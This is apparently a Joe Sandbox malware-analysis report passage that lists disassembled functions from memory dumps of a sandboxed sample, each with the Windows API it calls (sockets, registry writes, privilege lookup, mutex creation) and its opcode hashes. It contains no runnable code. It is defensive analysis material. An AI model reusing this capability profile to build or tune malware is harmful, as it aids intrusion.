                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileView
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3314676101-0
                                                                                                                                                                    • Opcode ID: 9da80e7d0ba36312c813a89f644241c50dda12fd7bb18804c88cae851417d396
                                                                                                                                                                    • Instruction ID: d11136e19fa45cdc2c835d81f12ecc644b10c0fedd49ef3a640888b646100605
                                                                                                                                                                    • Opcode Fuzzy Hash: 9da80e7d0ba36312c813a89f644241c50dda12fd7bb18804c88cae851417d396
                                                                                                                                                                    • Instruction Fuzzy Hash: 8E21B171405344AFE722CB15DC44FA6FFF8EF09224F04849EE9858B652D375A558CB62
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0517073E Relevance: 1.6, APIs: 1, Instructions: 77networkCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • WSASocketW.WS2_32(?,?,?,?,?), ref: 051707CA
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Socket
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 38366605-0
                                                                                                                                                                    • Opcode ID: 9df6a109b80a8b1a1ae621a55e47fd5b82ef5d93314528d81021f45db69b6895
                                                                                                                                                                    • Instruction ID: 92be4280e6ed0a5dab4953c525759086bc03ea83aba078697a233749b8b6a7d1
                                                                                                                                                                    • Opcode Fuzzy Hash: 9df6a109b80a8b1a1ae621a55e47fd5b82ef5d93314528d81021f45db69b6895
                                                                                                                                                                    • Instruction Fuzzy Hash: 8A219171405344AFDB21CF55CC44F66FFB4EF05210F04889EE9858B652D375A418CB62
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 05170C02 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000E84), ref: 05170C73
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DescriptorSecurity$ConvertString
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3907675253-0
                                                                                                                                                                    • Opcode ID: 1573d564220a8f9c518ce0c770826da0723698cc8759d3831230e1aca2f1835e
                                                                                                                                                                    • Instruction ID: 633145ddb6ddac0af64800fc693091afec146ceef1eb62d5b236c3a6e584857c
                                                                                                                                                                    • Opcode Fuzzy Hash: 1573d564220a8f9c518ce0c770826da0723698cc8759d3831230e1aca2f1835e
                                                                                                                                                                    • Instruction Fuzzy Hash: 8E21C272600304AFEB20CF29DC49FAABBE8EF04314F04885AE945CB641D774E5098AA2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 05170AEA Relevance: 1.6, APIs: 1, Instructions: 76registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegQueryValueExW.KERNEL32(?,00000E84,ADB2B937,00000000,00000000,00000000,00000000), ref: 05170B88
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: QueryValue
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3660427363-0
                                                                                                                                                                    • Opcode ID: bc5650936ec3542dd961922653a7f5c56da43df9e59c3e6ce61e19b797945426
                                                                                                                                                                    • Instruction ID: ea0075463119e9105f000871ebf8c384a0d57275291f39310c61c20041164a41
                                                                                                                                                                    • Opcode Fuzzy Hash: bc5650936ec3542dd961922653a7f5c56da43df9e59c3e6ce61e19b797945426
                                                                                                                                                                    • Instruction Fuzzy Hash: 5F21D176504384AFD721CB15CC88F67BFF8EF49314F08849AE9858B692D325E508CB61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00FFB0A6 Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 00FFB125
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                    • Opcode ID: cd1a03c2122bf1b69cc24adefabf5266d8ccf34c83b528fc4d19546bf100fb25
                                                                                                                                                                    • Instruction ID: a15b66a4b2eb432bfe34eb66df867e549f2ea64a08a92d1541bcc400bda43db8
                                                                                                                                                                    • Opcode Fuzzy Hash: cd1a03c2122bf1b69cc24adefabf5266d8ccf34c83b528fc4d19546bf100fb25
                                                                                                                                                                    • Instruction Fuzzy Hash: 2E218171500204AFEB21CF66DC85B66FBE8EF04720F04845DEA458B662D375E518DB71
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 05171676 Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 051716FA
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3899507212-0
                                                                                                                                                                    • Opcode ID: 403b18116176ec744ae196a8c235bfd35db38aa5b79cbc5e2c270142b978a250
                                                                                                                                                                    • Instruction ID: 328e45b25dab20713e9804b4b35616faf639bd85ac48fda3a54968e6b9f338da
                                                                                                                                                                    • Opcode Fuzzy Hash: 403b18116176ec744ae196a8c235bfd35db38aa5b79cbc5e2c270142b978a250
                                                                                                                                                                    • Instruction Fuzzy Hash: 12218E766093C05FDB128B25DC55BA2BFF8EF06220F0C84DAE8C5CB263D2649848C761
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00FFB24C Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • WriteFile.KERNEL32(?,00000E84,ADB2B937,00000000,00000000,00000000,00000000), ref: 00FFB2DD
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileWrite
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3934441357-0
                                                                                                                                                                    • Opcode ID: 2fca557e487dc827ccac949f4796c429765ce35f6bf0551bac2d5cf1cb0248a5
                                                                                                                                                                    • Instruction ID: 121176d0b67f30cbe695aef346d6fb5cf34dc6f90ba49c42d31686fedd275d15
                                                                                                                                                                    • Opcode Fuzzy Hash: 2fca557e487dc827ccac949f4796c429765ce35f6bf0551bac2d5cf1cb0248a5
                                                                                                                                                                    • Instruction Fuzzy Hash: 0021A471409384AFD7228B51DC44F66BFB8EF46314F08849BE9848B563C265A919CB76
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00FFAB0E Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegOpenKeyExW.KERNEL32(?,00000E84), ref: 00FFAB8D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Open
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 71445658-0
                                                                                                                                                                    • Opcode ID: 449d69b0817d8e93ce55a2104afb8d5d7b0b25e387d8051b00bc61bd2ecef6bc
                                                                                                                                                                    • Instruction ID: 612b6c025cb43dd341bd727c9ab87b6ece3888985d4ee0759605f904cc7ed1ea
                                                                                                                                                                    • Opcode Fuzzy Hash: 449d69b0817d8e93ce55a2104afb8d5d7b0b25e387d8051b00bc61bd2ecef6bc
                                                                                                                                                                    • Instruction Fuzzy Hash: C221A4B2500208AEEB218F55CC44FBBFBECEF44324F04845AEA4587652D774E549CAB6
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 05171B4B Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetProcessWorkingSetSize.KERNEL32(?,00000E84,ADB2B937,00000000,00000000,00000000,00000000), ref: 05171BC7
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ProcessSizeWorking
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3584180929-0
                                                                                                                                                                    • Opcode ID: 1cfa79a78e4a8400615b185ed0d07d1357907d2de193655ffc765d5f29109ba9
                                                                                                                                                                    • Instruction ID: 2e1ff3f875dc2a80a5ee50175327cddf354b83df01e7d82d8d83f29fefb9228f
                                                                                                                                                                    • Opcode Fuzzy Hash: 1cfa79a78e4a8400615b185ed0d07d1357907d2de193655ffc765d5f29109ba9
                                                                                                                                                                    • Instruction Fuzzy Hash: 8B21D4715053846FDB21CB65CC44FA6BFB8EF45220F08849AE944CB552D374A518CBB6
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 05171A67 Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessWorkingSetSize.KERNEL32(?,00000E84,ADB2B937,00000000,00000000,00000000,00000000), ref: 05171AE3
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ProcessSizeWorking
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3584180929-0
                                                                                                                                                                    • Opcode ID: 1cfa79a78e4a8400615b185ed0d07d1357907d2de193655ffc765d5f29109ba9
                                                                                                                                                                    • Instruction ID: 05139c42356b73382113b684d47680d9aa65cda35a587fb597cbfb5bb275658c
                                                                                                                                                                    • Opcode Fuzzy Hash: 1cfa79a78e4a8400615b185ed0d07d1357907d2de193655ffc765d5f29109ba9
                                                                                                                                                                    • Instruction Fuzzy Hash: 7121D4715093846FDB21CB25DC84FA6BFB8EF45220F08849AE944DB552D374A518CB76
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00FFB522 Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateMutexW.KERNEL32(?,?), ref: 00FFB595
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateMutex
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1964310414-0
                                                                                                                                                                    • Opcode ID: ceb28a9b28c5ec63321b5f88c8eaa8d26dd2f8870e5255f12647c8ab52384839
                                                                                                                                                                    • Instruction ID: 263b862a3bda442467fb722ad607c502d074959fecbf9873f0d3747bed246e1e
                                                                                                                                                                    • Opcode Fuzzy Hash: ceb28a9b28c5ec63321b5f88c8eaa8d26dd2f8870e5255f12647c8ab52384839
                                                                                                                                                                    • Instruction Fuzzy Hash: 0321B3716002049FEB10CF25DC45BA6FBE8EF04320F088459ED498B656D775E908CA75
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00FFAC16 Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegQueryValueExW.KERNEL32(?,00000E84,ADB2B937,00000000,00000000,00000000,00000000), ref: 00FFAC90
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: QueryValue
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3660427363-0
                                                                                                                                                                    • Opcode ID: ec6ccbe1677a4966589eb7ebd5d03d60de3a69e0ebb6ac4103c2d41b8c676e66
                                                                                                                                                                    • Instruction ID: 1328bf2b29066daceeea1b189ba4f2e56f824a2362f9fb638546cf338e04999c
                                                                                                                                                                    • Opcode Fuzzy Hash: ec6ccbe1677a4966589eb7ebd5d03d60de3a69e0ebb6ac4103c2d41b8c676e66
                                                                                                                                                                    • Instruction Fuzzy Hash: 4A2163B6600204AFE721CF15CC84FA6F7ECEF04720F04845AEA498B761D764E949DAB6
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 05170DB2 Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileView
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3314676101-0
                                                                                                                                                                    • Opcode ID: 1466539cfee8ac0a01356190180c68f80e3504f59be28010d9d63606d8f7f8c4
                                                                                                                                                                    • Instruction ID: 682b28e9c08bc4a52730dea28747e594a7b03b1f12d992e40fe397e5ab406560
                                                                                                                                                                    • Opcode Fuzzy Hash: 1466539cfee8ac0a01356190180c68f80e3504f59be28010d9d63606d8f7f8c4
                                                                                                                                                                    • Instruction Fuzzy Hash: 8E21C371500204AFEB21CF16DC49FA6FBE8EF08324F04845DE9458B652D775E459CBA6
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 051715BA Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 05171636
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Connect
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3144859779-0
                                                                                                                                                                    • Opcode ID: 3dcd465e0c2a210785a8671fb3a33b3b42caf15bb745d4eb602127cfa0f0c325
                                                                                                                                                                    • Instruction ID: a370093042f6fb7fd1344f417ce14bcf1be76400ae846765c948077cbddd8d34
                                                                                                                                                                    • Opcode Fuzzy Hash: 3dcd465e0c2a210785a8671fb3a33b3b42caf15bb745d4eb602127cfa0f0c325
                                                                                                                                                                    • Instruction Fuzzy Hash: 23219F75508384AFDB228F65DC44F62BFF4EF46310F0888DAE9858B163D375A819DB62
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0517075E Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • WSASocketW.WS2_32(?,?,?,?,?), ref: 051707CA
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Socket
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 38366605-0
                                                                                                                                                                    • Opcode ID: 53788e6b682ed3e0feeb1c2c73d62909b62e86c312abedb35b7dd829002a609f
                                                                                                                                                                    • Instruction ID: 057d70d1283b626743d2718291a881bd32074a1e86e8619d704bd204ffe74a6b
                                                                                                                                                                    • Opcode Fuzzy Hash: 53788e6b682ed3e0feeb1c2c73d62909b62e86c312abedb35b7dd829002a609f
                                                                                                                                                                    • Instruction Fuzzy Hash: 6321CF71500204AFEB21CF65CC49FA6FBE4EF08320F04885EE9858B652D375A418CBA2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00FFB62A Relevance: 1.6, APIs: 1, Instructions: 66windowtimeCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SendMessageTimeoutA.USER32(?,00000E84), ref: 00FFB6A5
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: MessageSendTimeout
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1599653421-0
                                                                                                                                                                    • Opcode ID: f9f7b87c7bf1867dd19881efa6272aafcab08a3080eed77572ba2918fd098a42
                                                                                                                                                                    • Instruction ID: dd569c7839d15c168e1b311f4f8dbf4b0871cb55225a7852a6c73a071bd26fd8
                                                                                                                                                                    • Opcode Fuzzy Hash: f9f7b87c7bf1867dd19881efa6272aafcab08a3080eed77572ba2918fd098a42
                                                                                                                                                                    • Instruction Fuzzy Hash: C321DF72500204AFEB318F11CC44FB6FBE8EF04320F14849AEE458AAA1D375A519DBB5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 05170B16 Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegQueryValueExW.KERNEL32(?,00000E84,ADB2B937,00000000,00000000,00000000,00000000), ref: 05170B88
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: QueryValue
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3660427363-0
                                                                                                                                                                    • Opcode ID: c8b7e6515be48ab58d4092b57346d581ba50f202c35e5fcbce5bb2ece294e6dc
                                                                                                                                                                    • Instruction ID: 810c50e2003dc339fbaadcdc7fd562addb3f210c8bad9b88d9e6919b3b8ed937
                                                                                                                                                                    • Opcode Fuzzy Hash: c8b7e6515be48ab58d4092b57346d581ba50f202c35e5fcbce5bb2ece294e6dc
                                                                                                                                                                    • Instruction Fuzzy Hash: D111A276500704AFDB20CF55CC84FA6B7E8EF08714F04849AE9458B652D764E548CAB5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00FFB362 Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegSetValueExW.KERNEL32(?,00000E84,ADB2B937,00000000,00000000,00000000,00000000), ref: 00FFB3D4
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Value
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3702945584-0
                                                                                                                                                                    • Opcode ID: dcb0006f79f42c7a38ffffa658381bbef9b17c1a9a3efedc84d8f4d93f5b6421
                                                                                                                                                                    • Instruction ID: 621b976dc5a653b4129fa369ad50344cec8444effe61e8b4bc2b2a1163167266
                                                                                                                                                                    • Opcode Fuzzy Hash: dcb0006f79f42c7a38ffffa658381bbef9b17c1a9a3efedc84d8f4d93f5b6421
                                                                                                                                                                    • Instruction Fuzzy Hash: 8911B476500204AFE7218F11CC44FA6BBE8EF04720F04845AEE4587752D774E409DAB1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0517131E Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessTimes.KERNEL32(?,00000E84,ADB2B937,00000000,00000000,00000000,00000000), ref: 0517137D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ProcessTimes
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1995159646-0
                                                                                                                                                                    • Opcode ID: 7f4d734e21bc1d9cc2a61685df1eee1a697fa339e57d0f527ec1027dcb9e17f3
                                                                                                                                                                    • Instruction ID: 3bcfdfbf9a02e0331fb41a8b610a78a55fdb48a1deb7d553fc5f6d42d589fd4c
                                                                                                                                                                    • Opcode Fuzzy Hash: 7f4d734e21bc1d9cc2a61685df1eee1a697fa339e57d0f527ec1027dcb9e17f3
                                                                                                                                                                    • Instruction Fuzzy Hash: 7111D072600204AFEB21CF56DC84FAABBE8EF44324F04846AE945CBA51D774E418CBB1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00FFAE3F Relevance: 1.6, APIs: 1, Instructions: 63timeCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Timer
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2870079774-0
                                                                                                                                                                    • Opcode ID: 180c8562674ee256b471801927d6d7a98daff10609468acbc344479d107cce8e
                                                                                                                                                                    • Instruction ID: 36a51a01f128b7771fae74ab4014c645d8a9339d13079690c10e3812035c0c8d
                                                                                                                                                                    • Opcode Fuzzy Hash: 180c8562674ee256b471801927d6d7a98daff10609468acbc344479d107cce8e
                                                                                                                                                                    • Instruction Fuzzy Hash: F6218C7640D3C09FDB138B21DC94A62FFB0EF17320F0984CAE9C84B563D265A959DB62
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 05171A8A Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessWorkingSetSize.KERNEL32(?,00000E84,ADB2B937,00000000,00000000,00000000,00000000), ref: 05171AE3
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ProcessSizeWorking
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3584180929-0
                                                                                                                                                                    • Opcode ID: cff24f816e26c1f55c2e38523203d6fe4ea7c14785655856dba4a7072eb328a0
                                                                                                                                                                    • Instruction ID: 38e0b324c44f934f59a2df2ec6d7273f45a36bd3829bb945e7411958ee9dcc87
                                                                                                                                                                    • Opcode Fuzzy Hash: cff24f816e26c1f55c2e38523203d6fe4ea7c14785655856dba4a7072eb328a0
                                                                                                                                                                    • Instruction Fuzzy Hash: A011C172600204AFEB20CF15DC85FAABBE8EF44324F04846AED45DB681D774E558CBB5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 05171B6E Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetProcessWorkingSetSize.KERNEL32(?,00000E84,ADB2B937,00000000,00000000,00000000,00000000), ref: 05171BC7
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ProcessSizeWorking
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3584180929-0
                                                                                                                                                                    • Opcode ID: cff24f816e26c1f55c2e38523203d6fe4ea7c14785655856dba4a7072eb328a0
                                                                                                                                                                    • Instruction ID: 6aefc4cf30200a793c5cb46838c44243279d61afc56741f6446bf9df1152425e
